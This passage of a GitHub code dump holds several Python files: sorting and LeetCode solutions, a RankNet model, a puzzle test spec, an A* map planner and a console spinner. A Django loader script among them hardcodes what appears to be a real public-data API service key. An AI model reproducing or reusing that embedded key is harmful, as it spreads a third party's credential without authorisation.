data[0][0]\nprint(result)\n","repo_name":"commons-app/commonsmisc","sub_path":"uploadsbyuser.py","file_name":"uploadsbyuser.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"70725021028","text":"from clrs import *\nimport random\nimport math\n\n# 8.3-4 p200\n\ndef gen():\n n = random.randint(100,1000)\n k = n ** 3\n return [random.randint(0, k - 1) for _ in xrange(n)], k\n\ndef radix_sort(a, k):\n def counting_sort(a, i_shift):\n get_v = lambda n: (n >> i_shift * r) & mask\n b = list(a)\n c = [0] * kr\n a, b = b, a\n for n in a:\n v = get_v(n)\n c[v] += 1\n for i in xrange(1, kr):\n c[i] += c[i - 1]\n for i in xrange(len(a) - 1, -1, -1):\n n = a[i]\n v = get_v(n)\n c[v] -= 1\n b[c[v]] = n\n n = len(a)\n r = int(math.log(n, 2))\n kr = 2 ** r\n mask = 1\n for _ in xrange(r - 1):\n mask = (mask << 1) | 1\n lgk = int(math.ceil(math.log(k, 2)))\n m = (lgk + r - 1) // r\n for i_shift in xrange(m):\n counting_sort(a, i_shift)\n return a\n\n@check\ndef _():\n a, k = gen()\n oa = list(a)\n ans = radix_sort(a, k)\n rans = sorted(oa)\n yield ans == rans\n","repo_name":"fans656-deprecated/clrs","sub_path":"20.1 radix sort n^3 - 1.py","file_name":"20.1 radix sort n^3 - 1.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8498790569","text":"import torch\nimport numpy as np\nimport torch.nn as nn\nfrom torch.nn.init import xavier_normal_ as nr_init\nfrom config.activation import activation\n\n\n\nclass RankNet(nn.Module):\n def __init__(self, f_para_dict=None):\n super(RankNet, self).__init__()\n self.model = self.ini_ffnns(**f_para_dict)\n\n def ini_ffnns(self, input_dim=None, h_dim=None, out_dim=1, num_layers=None, hd_af=None, hn_af=None, tl_af=None, dropout_rate=None, apply_tl_af=None):\n head_AF, hidden_AF, tail_AF = activation(hd_af), activation(hn_af), activation(tl_af)\n\n ffnns = nn.Sequential()\n if 1 == num_layers:\n nr_h1 = nn.Linear(input_dim, out_dim) # Input layer\n nr_init(nr_h1.weight)\n ffnns.add_module('L_1', nr_h1)\n\n if apply_tl_af:\n ffnns.add_module('ACT_1', tail_AF)\n else:\n nr_h1 = nn.Linear(input_dim, h_dim)\n nr_init(nr_h1.weight)\n ffnns.add_module('L_1', nr_h1)\n ffnns.add_module('ACT_1', head_AF)\n\n if num_layers > 2: # Hidden layer\n for i in range(2, num_layers):\n h_dim_half = h_dim / 2\n ffnns.add_module('_'.join(['DR', str(i)]), nn.Dropout(dropout_rate))\n nr_hi = nn.Linear(h_dim, int(h_dim_half))\n nr_init(nr_hi.weight)\n ffnns.add_module('_'.join(['L', str(i)]), nr_hi)\n ffnns.add_module('_'.join(['ACT', str(i)]), hidden_AF)\n h_dim = int(h_dim_half)\n nr_hn = nn.Linear(int(h_dim_half), out_dim) #Output layer\n nr_init(nr_hn.weight)\n ffnns.add_module('_'.join(['L', str(num_layers)]), nr_hn)\n if apply_tl_af:\n ffnns.add_module('_'.join(['ACT', str(num_layers)]), tail_AF)\n\n return ffnns\n\n\n def forward(self, torch_batch_rankings, torch_batch_std_labels):\n\n # Make a pair from the model predictions\n batch_pred = self.model(torch_batch_rankings) # batch_pred = [40,1]\n batch_pred_dim = torch.squeeze(batch_pred, 1) # batch_pred_dim = [40]\n batch_pred_diffs = batch_pred - torch.unsqueeze(batch_pred_dim, 0) # batch_pred_diffs = [40, 40]\n\n # Make a pair from the relevance of the label\n batch_std = torch_batch_std_labels # batch_std = [40]\n batch_std_diffs = torch.unsqueeze(batch_std, 1) - torch.unsqueeze(batch_std, 0) # batch_std_diffs = [40, 40]\n\n # Align to -1 ~ 1\n batch_Sij = torch.clamp(batch_std_diffs, -1, 1)\n\n sigma = 1.0\n batch_loss_1st = 0.5 * sigma * batch_pred_diffs * (1.0 - batch_Sij)\n batch_loss_2nd = torch.log(torch.exp(-sigma * batch_pred_diffs) + 1.0)\n\n # Calculate loss outside diagonal\n diagona = 1 - torch.eye(batch_loss_1st.shape[0])\n batch_loss = (batch_loss_1st + batch_loss_2nd) * diagona\n combination = (batch_loss_1st.shape[0] * (batch_loss_1st.shape[0] - 1)) / 2\n\n batch_loss_triu = (torch.sum(batch_loss) / 2) / combination\n\n #print(batch_loss_triu)\n\n return batch_loss_triu\n\n def predict(self, x):\n return self.model(x)\n\n","repo_name":"ryo59/Learning_to_rank","sub_path":"model/RankNet/ranknet.py","file_name":"ranknet.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"15690597034","text":"from puzzle.heuristics import analyze\nfrom puzzle.problems import problem\nfrom puzzle.puzzlepedia import puzzle\nfrom spec.mamba import *\n\n\nclass TestProblem(problem.Problem):\n @staticmethod\n def score(lines):\n if len(lines) > 1:\n return 0\n return 0.9\n\n def _solve(self):\n return {'meta: '+ ''.join(self.lines): 1}\n\n\nclass WeakMatchProblem(problem.Problem):\n @staticmethod\n def score(lines):\n del lines\n return 0.1\n\n def _solve(self):\n return {'meta: weak match': 0.1}\n\n\nclass MetaProblem(problem.Problem):\n @staticmethod\n def score(lines):\n src = '\\n'.join(lines)\n if src.startswith('meta:'):\n return 1\n return 0\n\n def _solve(self):\n return {'final solution': 1}\n\n\ndef _get_multi_puzzle():\n return puzzle.Puzzle('multi-puzzle', textwrap.dedent(\"\"\"\n sample 1\n sample 2\n \"\"\"))\n\n\nwith description('Puzzle'):\n with before.all:\n analyze.reset() # https://github.com/nestorsalceda/mamba/issues/91\n analyze.register(TestProblem)\n analyze.register(WeakMatchProblem)\n analyze.register(MetaProblem)\n\n with after.all:\n analyze.reset()\n\n with it('instantiates from string'):\n expect(puzzle.Puzzle('empty', '')).not_to(be_none)\n\n with it('instantiates from list'):\n expect(puzzle.Puzzle('empty', [''])).not_to(be_none)\n\n with it('instantiates from Puzzle'):\n expect(puzzle.Puzzle('empty', puzzle.Puzzle('child', ''))).not_to(be_none)\n\n with it('rejects invalid input'):\n expect(lambda: puzzle.Puzzle('empty', None)).to(\n raise_error(NotImplementedError))\n\n with it('selects the best matching problem'):\n p = puzzle.Puzzle('sample', 'sample')\n expect(p.problems()[0]).to(be_a(TestProblem))\n expect(p.problems()[0].kind).to(equal('TestProblem'))\n\n with it('selects the best solutions'):\n p = puzzle.Puzzle('sample', 'sample')\n expect(p.solutions()).to(equal(['meta: sample']))\n\n with it('allows solution override'):\n p = puzzle.Puzzle('sample', 'sample')\n p.problem(0).solution = 'solution override'\n expect(p.solutions()).to(equal(['solution override']))\n\n with description('multiple problems'):\n with it('finds multiple solutions'):\n p = _get_multi_puzzle()\n expect(p.solutions()).to(equal(['meta: sample 1', 'meta: sample 2']))\n\n with it('creates a second stage from the first'):\n stage2 = _get_multi_puzzle().get_next_stage()\n expect(stage2).to(be_a(puzzle.Puzzle))\n\n with it('finds the solution to the second stage'):\n stage2 = _get_multi_puzzle().get_next_stage()\n expect(stage2.solutions()).to(equal(['final solution']))\n\n with description('async changes'):\n with it('notifies problem subscribers when solution changes'):\n p = puzzle.Puzzle('sample', 'sample')\n subs = mock.Mock()\n p.subscribe(subs)\n expect(subs.on_next.call_count).to(equal(0))\n p.problem(0).solution = 'solution override'\n expect(subs.on_next.call_count).to(equal(1))\n expect(subs.on_next.call_args).to(equal(mock.call(\n ('sample.0', p.problem(0))\n )))\n\n with description('regression tests'):\n with it('parses clues in order'):\n source = textwrap.dedent(\"\"\"\n Classic Billy Wilder movie (4 wds)\n It ended with the Siege of Yorktown (2 wds)\n It may warn you of suprising object sizes (3 wds)\n Like most solid objects, as opposed to linear (hyph.)\n One who studies the spread of diseases\n The point in the orbit of a planet at which its closest to the sun\n Something asked intended to provoke a specific response (2 wds)\n Sort of valuable, like some gemstones\n Thoughtful discussion, as before a bill\n \"\"\").strip()\n lines = source.split('\\n')\n p = puzzle.Puzzle('ex', source)\n expect(p.problems()).to(have_len(len(lines)))\n for problem, line in zip(p.problems(), lines):\n expect(problem.lines).to(equal([line]))\n","repo_name":"PhilHarnish/forge","sub_path":"spec/puzzle/puzzlepedia/puzzle_spec.py","file_name":"puzzle_spec.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"18812920382","text":"# Word Ladder II\nimport sys\nfrom collections import deque, defaultdict\n\npaths = set()\ndef dfs(connections, distance, beginWord, cur, path=None, visited=None):\n if path is None: path = []\n if visited is None: visited = set()\n path.append(cur)\n visited.add(cur)\n if cur == beginWord: paths.add(tuple(reversed(path)))\n for i in range(len(cur)):\n pattern = cur[:i] + '-' + cur[i + 1:]\n for word in connections[pattern]:\n if word not in visited:\n if distance[word] == distance[cur] - 1: dfs(connections, distance, beginWord, word, path.copy(), visited.copy())\n\nclass Solution:\n def findLadders(self, beginWord, endWord, wordList):\n wordList.append(beginWord)\n connections = defaultdict(list)\n for word in wordList:\n for i in range(len(word)):\n pattern = word[:i] + '-' + word[i + 1:]\n connections[pattern].append(word)\n distance = defaultdict(lambda: sys.maxsize)\n visited = defaultdict(lambda: False)\n queue = deque()\n queue.appendleft(beginWord)\n distance[beginWord] = 0\n visited[beginWord] = True\n while queue:\n cur = queue.pop()\n for i in range(len(cur)):\n pattern = cur[:i] + '-' + cur[i + 1:]\n for word in connections[pattern]:\n if not visited[word]:\n queue.appendleft(word)\n visited[word] = True\n distance[word] = distance[cur] + 1\n global paths\n paths = set()\n dfs(connections, distance, beginWord, endWord)\n return list(paths)","repo_name":"aqts-aqts/Leetcode","sub_path":"126.py","file_name":"126.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"18632230393","text":"import os\nimport django\nimport requests\nimport csv\nimport math\nfrom datetime import datetime\n\nfrom xml.etree import ElementTree as ET\n\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = 'elderlyhome.settings'\ndjango.setup()\n\nfrom homes.models import Sigungu, Sido, Home\n\nWHOLE_SEARCH_URL = 'http://apis.data.go.kr/B550928/searchLtcInsttService/getLtcInsttSeachList'\nWHOLE_SEARCH_API_KEY = '7VNKCOoEs9UMYSx%2B7ksl2Tccbio3kT4xLLVFQhqnCf7DEZdaJEYnRIg2kKECa1OkN7DIFqNCI5mGetBCED7CwQ%3D%3D'\n\nsigungus = Sigungu.objects.all()\n\nindex = 0\n\nfor sigungu in sigungus:\n sido = Sido.objects.get(sido_code=sigungu.sido_code.sido_code)\n\n url = WHOLE_SEARCH_URL + '?serviceKey=' + WHOLE_SEARCH_API_KEY + '&siDoCd=' + str(sigungu.sido_code.sido_code) + '&siGunGuCd=' + sigungu.sigungu_code\n # print(url)\n response = requests.get(url)\n root = ET.fromstring(response.text)\n totalCount = int(root.find('body').find('totalCount').text)\n ceilCount = math.ceil(totalCount / 10)\n for i in range(ceilCount):\n pageUrl = url + '&pageNo=' + str(i + 1) + '&numOfRows=10'\n pageResponse = requests.get(pageUrl)\n pageRoot = ET.fromstring(pageResponse.text)\n item_array = pageRoot.find('body').find('items')\n items = item_array.findall('item')\n for item in items:\n adminNm = item.find('adminNm').text\n adminPttnCd = item.find('adminPttnCd').text\n longTermAdminSym = item.find('longTermAdminSym').text\n\n if Home.objects.filter(lt_sym_code=longTermAdminSym).count() == 0:\n h = Home.objects.create(\n home_name=adminNm,\n sido_code=sido,\n sigungu_code=sigungu,\n pttn_code=adminPttnCd,\n lt_sym_code=longTermAdminSym,\n address='',\n geo_lat='',\n geo_lng='',\n max_capacity=0,\n current_person=0,\n created_date=datetime.now(),\n updated_date=datetime.now()\n )\n print(index, sigungu.sigungu_name, adminNm)\n index = index + 1\n else:\n print(index, 'pass')\n index = index + 1\n","repo_name":"parkindani/eh-django-docker","sub_path":"scripts/load-data-whole.py","file_name":"load-data-whole.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5408219977","text":"class Solution:\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n def dfs(p=p, q=q):\n#if one value is null return false\n if(p and not q):\n return False\n elif(q and not p):\n return False\n#if both are null return true\n elif not (p and q):\n return True\n#values are equal call the function on left and right\n if(p.val==q.val):\n #return true if both left and right are equal\n return(dfs(p.left, q.left) and dfs(p.right, q.right))\n else:\n#if they aren't equal return false\n return False\n \n return(dfs())","repo_name":"MaoxinTang/Train_algorithm","sub_path":"CodingTrain/Same Tree.py","file_name":"Same Tree.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74785413667","text":"'''\r\n A*, path planner solution\r\n\r\n\r\nGROUP 14 - HAUQUE, IVANOV, TAN\r\n'''\r\n\r\nfrom tkinter import *\r\nimport struct\r\nimport xml.etree.ElementTree as ET\r\nfrom queue import *\r\nimport math\r\nimport numpy as np\r\nfrom numpy import long\r\n\r\n# bounds of the window, in lat/long\r\n\r\n\r\nLEFTLON = -78.8623\r\nRIGHTLON = -78.832\r\nTOPLAT = 43.8983\r\nBOTLAT = 43.8881\r\nWIDTH = RIGHTLON - LEFTLON\r\nHEIGHT = TOPLAT - BOTLAT\r\n# ratio of one degree of longitude to one degree of latitude\r\nLONRATIO = math.cos(TOPLAT * 3.1415 / 180)\r\nWINWID = 800\r\nWINHGT = (int)((WINWID / LONRATIO) * HEIGHT / WIDTH)\r\nTOXPIX = WINWID / WIDTH\r\nTOYPIX = WINHGT / HEIGHT\r\n# width,height of elevation array\r\nEPIX = 3601\r\n# approximate number of meters per degree of latitude\r\nMPERLAT = 111000\r\nMPERLON = MPERLAT * LONRATIO\r\n\r\ndef node_dist(n1, n2):\r\n ''' Distance between nodes n1 and n2, considering the elevation difference (in meters) '''\r\n dx = (n2.pos[0] - n1.pos[0]) * MPERLON\r\n dy = (n2.pos[1] - n1.pos[1]) * MPERLAT\r\n plain_distance = math.sqrt(dx * dx + dy * dy)\r\n elev_diff = n1.elev - n2.elev\r\n return math.sqrt(elev_diff * elev_diff + plain_distance * plain_distance) # in meters\r\n\r\nclass Node():\r\n ''' Graph (map) node, not a search node! '''\r\n __slots__ = ('id', 'pos', 'ways', 'elev', 'waystr', 'wayset')\r\n\r\n def __init__(self, id, p, e=0):\r\n self.id = id\r\n self.pos = p\r\n self.ways = []\r\n self.elev = e\r\n self.waystr = None\r\n\r\n def __str__(self):\r\n if self.waystr is None:\r\n self.waystr = self.get_waystr()\r\n return str(self.pos) + \": \" + self.waystr\r\n\r\n def get_waystr(self):\r\n if self.waystr is None:\r\n self.waystr = \"\"\r\n self.wayset = set()\r\n for w in self.ways:\r\n self.wayset.add(w.way.name)\r\n for w in self.wayset:\r\n self.waystr += w + \" \"\r\n return self.waystr\r\n\r\n\r\nclass Edge():\r\n ''' Graph (map) edge. Includes cost computation.'''\r\n __slots__ = ('way', 'dest', 'cost')\r\n\r\n def __init__(self, w, src, d):\r\n self.way = w\r\n self.dest = d\r\n self.cost = node_dist(src, d)\r\n if d.elev > src.elev:\r\n self.cost += (d.elev - src.elev) * 2\r\n if self.way.type == 'steps':\r\n self.cost *= 1.5\r\n\r\n\r\nclass Way():\r\n ''' A way is an entire street, for drawing, not searching. '''\r\n __slots__ = ('name', 'type', 'nodes')\r\n\r\n # nodes here for ease of drawing only\r\n def __init__(self, n, t):\r\n self.name = n\r\n self.type = t\r\n self.nodes = []\r\n\r\nclass Planner():\r\n __slots__ = ('nodes', 'ways')\r\n\r\n def __init__(self, n, w):\r\n self.nodes = n\r\n self.ways = w\r\n\r\n def heur(self, node, gnode):\r\n '''\r\n We changed the heuristic function taking into account the elevation of each node.\r\n '''\r\n return node_dist(node, gnode)\r\n\r\n def plan(self, s, g):\r\n '''\r\n Standard A* search\r\n '''\r\n if(s!=g):\r\n parents = {}\r\n costs = {}\r\n q = PriorityQueue()\r\n q.put((self.heur(s, g), s))\r\n parents[s] = None\r\n costs[s] = 0\r\n while not q.empty():\r\n cf, cnode = q.get()\r\n if cnode == g:\r\n print(\"Path found, time will be\", costs[g] * 60 / 5000, \" minutes.\") # 5 km/hr known as the preferred walking distance.\r\n return self.make_path(parents, g)\r\n for edge in cnode.ways:\r\n newcost = costs[cnode] + edge.cost\r\n if edge.dest not in parents or newcost < costs[edge.dest]:\r\n parents[edge.dest] = (cnode, edge.way)\r\n costs[edge.dest] = newcost\r\n q.put((self.heur(edge.dest, g) + newcost, edge.dest))\r\n else:\r\n print('Start and goal nodes are the same! - Closing the window')\r\n sys.exit(0)\r\n\r\n\r\n def make_path(self, par, g):\r\n nodes = []\r\n ways = []\r\n curr = g #Current is equal to g. Arranca de atras para adelante.\r\n nodes.append(curr)\r\n while par[curr] is not None:\r\n prev, way = par[curr]\r\n ways.append(way.name)\r\n nodes.append(prev)\r\n curr = prev\r\n nodes.reverse() #Se dan vuelta los arreglos\r\n ways.reverse()\r\n return nodes, ways\r\n\r\nclass PlanWin(Frame):\r\n '''\r\n All the GUI pieces to draw the streets, allow places to be selected,\r\n and then draw the resulting path.\r\n '''\r\n\r\n __slots__ = ('whatis', 'nodes', 'ways', 'elevs', 'nodelab', 'elab', \\\r\n 'planner', 'lastnode', 'startnode', 'goalnode')\r\n\r\n def lat_lon_to_pix(self, latlon):\r\n x = (latlon[1] - LEFTLON) * (TOXPIX)\r\n y = (TOPLAT - latlon[0]) * (TOYPIX)\r\n return x, y\r\n\r\n def pix_to_elev(self, x, y):\r\n return self.lat_lon_to_elev(((TOPLAT - (y / TOYPIX)), ((x / TOXPIX) + LEFTLON)))\r\n\r\n def lat_lon_to_elev(self, latlon):\r\n # row is 0 for 44N, 3601 (EPIX) for 42N\r\n row = (int)((44 - latlon[0]) * EPIX)\r\n # col is 0 for 18 E, 3601 for 19 E\r\n col = (int)((latlon[1] + 79) * EPIX)\r\n return self.elevs[row][col]\r\n\r\n def maphover(self, event):\r\n self.elab.configure(text=str(self.pix_to_elev(event.x, event.y)))\r\n for (dx, dy) in [(0, 0), (-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1)]:\r\n ckpos = (event.x + dx, event.y + dy)\r\n if ckpos in self.whatis:\r\n self.lastnode = self.whatis[ckpos]\r\n lnpos = self.lat_lon_to_pix(self.nodes[self.lastnode].pos)\r\n self.canvas.coords('lastdot', (lnpos[0] - 2, lnpos[1] - 2, lnpos[0] + 2, lnpos[1] + 2))\r\n nstr = str(self.lastnode)\r\n nstr += \" - \"\r\n nstr += str(self.nodes[self.whatis[ckpos]].get_waystr())\r\n self.nodelab.configure(text=nstr)\r\n return\r\n\r\n def mapclick(self, event):\r\n ''' Canvas click handler:\r\n First click sets path start, second sets path goal\r\n '''\r\n print\r\n \"Clicked on \" + str(event.x) + \",\" + str(event.y) + \" last node \" + str(self.lastnode)\r\n if self.lastnode is None:\r\n return\r\n if self.startnode is None:\r\n self.startnode = self.nodes[self.lastnode]\r\n self.snpix = self.lat_lon_to_pix(self.startnode.pos)\r\n self.canvas.coords('startdot', (self.snpix[0] - 5, self.snpix[1] - 5, self.snpix[0] + 5, self.snpix[1] + 5))\r\n elif self.goalnode is None:\r\n self.goalnode = self.nodes[self.lastnode]\r\n self.snpix = self.lat_lon_to_pix(self.goalnode.pos)\r\n self.canvas.coords('goaldot', (self.snpix[0] - 5, self.snpix[1] - 5, self.snpix[0] + 5, self.snpix[1] + 5))\r\n\r\n def clear(self):\r\n ''' Clear button callback. '''\r\n self.lastnode = None\r\n self.goalnode = None\r\n self.startnode = None\r\n self.canvas.coords('startdot', (0, 0, 0, 0))\r\n self.canvas.coords('goaldot', (0, 0, 0, 0))\r\n self.canvas.coords('path', (0, 0, 0, 0))\r\n\r\n def plan_path(self):\r\n ''' Path button callback, plans and then draws path.'''\r\n print (\"Planning Began!\")\r\n if self.startnode is None or self.goalnode is None:\r\n print(\"Start or goal nodes haven't been defined yet\")\r\n return\r\n print(\"From\", self.startnode.id, \"to\", self.goalnode.id)\r\n nodes, ways = self.planner.plan(self.startnode, self.goalnode)\r\n lastway = \"\"\r\n for wayname in ways:\r\n if wayname != lastway:\r\n print (wayname)\r\n lastway = wayname\r\n coords = []\r\n for node in nodes:\r\n npos = self.lat_lon_to_pix(node.pos)\r\n coords.append(npos[0])\r\n coords.append(npos[1])\r\n print(\"Coords: \\n\", coords)\r\n # print node.id\r\n self.canvas.coords('path', *coords)\r\n\r\n def __init__(self, master, nodes, ways, coastnodes, elevs):\r\n self.whatis = {}\r\n self.nodes = nodes\r\n self.ways = ways\r\n self.elevs = elevs\r\n self.startnode = None\r\n self.goalnode = None\r\n self.planner = Planner(nodes, ways)\r\n thewin = Frame(master)\r\n w = Canvas(thewin, width=WINWID, height=WINHGT) # , cursor=\"crosshair\")\r\n w.bind(\"\", self.mapclick)\r\n w.bind(\"\", self.maphover)\r\n for waynum in self.ways:\r\n nlist = self.ways[waynum].nodes\r\n thispix = self.lat_lon_to_pix(self.nodes[nlist[0]].pos)\r\n if len(self.nodes[nlist[0]].ways) > 2:\r\n self.whatis[((int)(thispix[0]), (int)(thispix[1]))] = nlist[0]\r\n for n in range(len(nlist) - 1):\r\n nextpix = self.lat_lon_to_pix(self.nodes[nlist[n + 1]].pos)\r\n self.whatis[((int)(nextpix[0]), (int)(nextpix[1]))] = nlist[n + 1]\r\n w.create_line(thispix[0], thispix[1], nextpix[0], nextpix[1])\r\n thispix = nextpix\r\n #thispix = self.lat_lon_to_pix(self.nodes[coastnodes[0]].pos)\r\n ## also draw the coast:\r\n #for n in range(len(coastnodes) - 1):\r\n # nextpix = self.lat_lon_to_pix(self.nodes[coastnodes[n + 1]].pos)\r\n # w.create_line(thispix[0], thispix[1], nextpix[0], nextpix[1], fill=\"blue\")\r\n # thispix = nextpix\r\n\r\n # other visible things are hiding for now...\r\n w.create_line(0, 0, 0, 0, fill='orange', width=3, tag='path')\r\n\r\n w.create_oval(0, 0, 0, 0, outline='green', fill='green', tag='startdot')\r\n w.create_oval(0, 0, 0, 0, outline='red', fill='red', tag='goaldot')\r\n w.create_oval(0, 0, 0, 0, outline='blue', fill='blue', tag='lastdot')\r\n w.pack(fill=BOTH)\r\n self.canvas = w\r\n\r\n cb = Button(thewin, text=\"Clear\", command=self.clear)\r\n cb.pack(side=RIGHT, pady=5)\r\n\r\n sb = Button(thewin, text=\"Plan!\", command=self.plan_path)\r\n sb.pack(side=RIGHT, pady=5)\r\n\r\n nodelablab = Label(thewin, text=\"Node:\")\r\n nodelablab.pack(side=LEFT, padx=5)\r\n\r\n self.nodelab = Label(thewin, text=\"None\")\r\n self.nodelab.pack(side=LEFT, padx=5)\r\n\r\n elablab = Label(thewin, text=\"Elev:\")\r\n elablab.pack(side=LEFT, padx=5)\r\n\r\n self.elab = Label(thewin, text=\"0\")\r\n self.elab.pack(side=LEFT, padx=5)\r\n\r\n thewin.pack()\r\n\r\ndef build_graph(elevs):\r\n ''' Build the search graph from the OpenStreetMap XML. '''\r\n tree = ET.parse('South Oshawa Map.osm')\r\n root = tree.getroot()\r\n\r\n nodes = dict()\r\n ways = dict()\r\n waytypes = set()\r\n coastnodes = []\r\n for item in root:\r\n if item.tag == 'node':\r\n coords = ((float)(item.get('lat')), (float)(item.get('lon')))\r\n # row is 0 for 44N\r\n erow = (int)((44 - coords[0]) * EPIX)\r\n # col is 0 for 79 W\r\n ecol = (int)((coords[1] + 79) * EPIX)\r\n try:\r\n el = elevs[erow][ecol]\r\n except IndexError:\r\n el = 0\r\n nodes[(long)(item.get('id'))] = Node((long)(item.get('id')), coords, el)\r\n elif item.tag == 'way':\r\n useme = False\r\n oneway = False\r\n myname = 'unnamed way'\r\n for thing in item:\r\n if thing.tag == 'tag' and thing.get('k') == 'highway':\r\n useme = True\r\n mytype = thing.get('v')\r\n if thing.tag == 'tag' and thing.get('k') == 'name':\r\n myname = thing.get('v')\r\n if thing.tag == 'tag' and thing.get('k') == 'oneway':\r\n if thing.get('v') == 'yes':\r\n oneway = True\r\n if useme:\r\n wayid = (long)(item.get('id'))\r\n ways[wayid] = Way(myname, mytype)\r\n nlist = []\r\n for thing in item:\r\n if thing.tag == 'nd':\r\n nlist.append((long)(thing.get('ref')))\r\n thisn = nlist[0]\r\n for n in range(len(nlist) - 1):\r\n nextn = nlist[n + 1]\r\n nodes[thisn].ways.append(Edge(ways[wayid], nodes[thisn], nodes[nextn]))\r\n thisn = nextn\r\n if not oneway:\r\n thisn = nlist[-1]\r\n for n in range(len(nlist) - 2, -1, -1):\r\n nextn = nlist[n]\r\n nodes[thisn].ways.append(Edge(ways[wayid], nodes[thisn], nodes[nextn]))\r\n thisn = nextn\r\n ways[wayid].nodes = nlist\r\n return nodes, ways, coastnodes\r\n\r\ndef build_elevs(): #Code adapted from asuggested code in the internet - Reference: https://bit.ly/2E1rIYs\r\n height = EPIX\r\n width = EPIX\r\n fi = open(r\"n43_w079_1arc_v2.bil\", \"rb\")\r\n contents = fi.read()\r\n fi.close()\r\n s = \"<%dH\" % (int(width * height),)\r\n z = struct.unpack(s, contents)\r\n heights = np.zeros((height, width))\r\n for r in range(0, height):\r\n for c in range(0, width):\r\n elevation = z[((width) * r) + c]\r\n heights[r][c] = float(elevation)\r\n print(len(heights))\r\n return heights\r\n\r\nelevs = build_elevs()\r\nnodes, ways, coastnodes = build_graph(elevs)\r\nprint(elevs)\r\n\r\nmaster = Tk()\r\nthewin = PlanWin(master, nodes, ways, coastnodes, elevs)\r\nmainloop()","repo_name":"FedeHauque/AI-Assignment1","sub_path":"AI-As1-Res.py","file_name":"AI-As1-Res.py","file_ext":"py","file_size_in_byte":13524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19937151997","text":"import enum\r\nimport re\r\nimport sys\r\nimport itertools\r\nimport time\r\nfrom io import StringIO, TextIOWrapper\r\nfrom threading import Thread\r\nfrom typing import Optional, Self, Callable\r\n\r\n\r\nclass SysioProxy(StringIO):\r\n pass\r\n\r\n\r\nclass LoaderStyle(enum.Enum):\r\n SPINNER = \"spinner\"\r\n INDETERMINATE_BAR = \"indeterminate_bar\"\r\n\r\n\r\nclass Loader:\r\n __styles: dict[LoaderStyle, any] = {\r\n LoaderStyle.SPINNER: itertools.cycle(['/', '-', '+', '\\\\', '|']),\r\n LoaderStyle.INDETERMINATE_BAR: itertools.cycle([\r\n '|---------|',\r\n '|>--------|',\r\n '|->-------|',\r\n '|-->------|',\r\n '|--->-----|',\r\n '|---->----|',\r\n '|----->---|',\r\n '|------>--|',\r\n '|------->-|',\r\n '|-------->|',\r\n '|---------|',\r\n '|--------<|',\r\n '|-------<-|',\r\n '|------<--|',\r\n '|-----<---|',\r\n '|----<----|',\r\n '|---<-----|',\r\n '|--<------|',\r\n '|-<-------|',\r\n '|<--------|',\r\n ])\r\n }\r\n\r\n def get_message(self) -> Optional[str]:\r\n return self._message\r\n\r\n def set_message(self, message: Optional[str]) -> None:\r\n self._message = message\r\n self.__render_frame()\r\n\r\n def get_style(self) -> LoaderStyle:\r\n return self._style\r\n\r\n def set_style(self, style: LoaderStyle):\r\n self._style = style\r\n self.__render_frame()\r\n\r\n def set_style_and_message(self, style: LoaderStyle, message: Optional[str]):\r\n self._style = self.__styles[style]\r\n self._message = message\r\n self.__render_frame()\r\n\r\n message = property(get_message, set_message)\r\n style = property(get_style, set_style)\r\n\r\n def __init__(self,\r\n style: LoaderStyle = LoaderStyle.SPINNER,\r\n message: Optional[str] = None,\r\n refresh_interval_ms=50,\r\n show_timer: bool = True):\r\n if style not in self.__styles:\r\n raise KeyError(f\"{style} is not a valid Loader style. Valid styles are: {self.__styles.keys()}\")\r\n\r\n self._style = self.__styles[style]\r\n \"\"\"The current loader style.\"\"\"\r\n\r\n self.refresh_interval_ms = refresh_interval_ms\r\n \"\"\"The amount of time to wait before showing the next frame.\"\"\"\r\n\r\n self._message: Optional[str] = message\r\n \"\"\"If specified, a message to be displayed alongside the loader.\"\"\"\r\n\r\n self.show_timer = show_timer\r\n \"\"\"Whether the loading 'timer' should be prepended to the loader message.\"\"\"\r\n\r\n self.__thread: Optional[Thread] = None\r\n self.__frame: Optional[str] = None\r\n self.__start_time: Optional[int] = None\r\n\r\n self.__stdout_proxy = None\r\n self.__stderr_proxy = None\r\n\r\n self.__rendering = False\r\n \"\"\"Mutex for spinning status.\"\"\"\r\n\r\n def start(self, message: Optional[str] = None) -> Self:\r\n if self.__thread is not None:\r\n return\r\n\r\n if message is not None:\r\n self._message = message\r\n\r\n self.__start_time = int(time.time())\r\n\r\n # Install a standard output proxy if there isn't already one.\r\n self.__stdout_proxy = SysioProxy()\r\n sys.stdout = self.__stdout_proxy\r\n\r\n self.__stderr_proxy = SysioProxy()\r\n sys.stderr = self.__stderr_proxy\r\n\r\n self.__thread = Thread(target=self.__spin, daemon=True)\r\n self.__thread.start()\r\n\r\n return self\r\n\r\n def __render_frame(self):\r\n self.__rendering = True\r\n\r\n # Clear existing frame and return to start.\r\n if self.__frame is not None:\r\n self.__erase_line()\r\n sys.__stdout__.flush()\r\n\r\n # Check if the standard output proxy is waiting to print data.\r\n self.__flush_proxy(proxy=self.__stdout_proxy, stream=sys.__stdout__)\r\n self.__flush_proxy(proxy=self.__stderr_proxy, stream=sys.__stderr__)\r\n\r\n # Render new frame.\r\n self.__frame = next(self._style)\r\n self.__frame += (f' {self._message}' if self._message is not None else '')\r\n self.__frame += 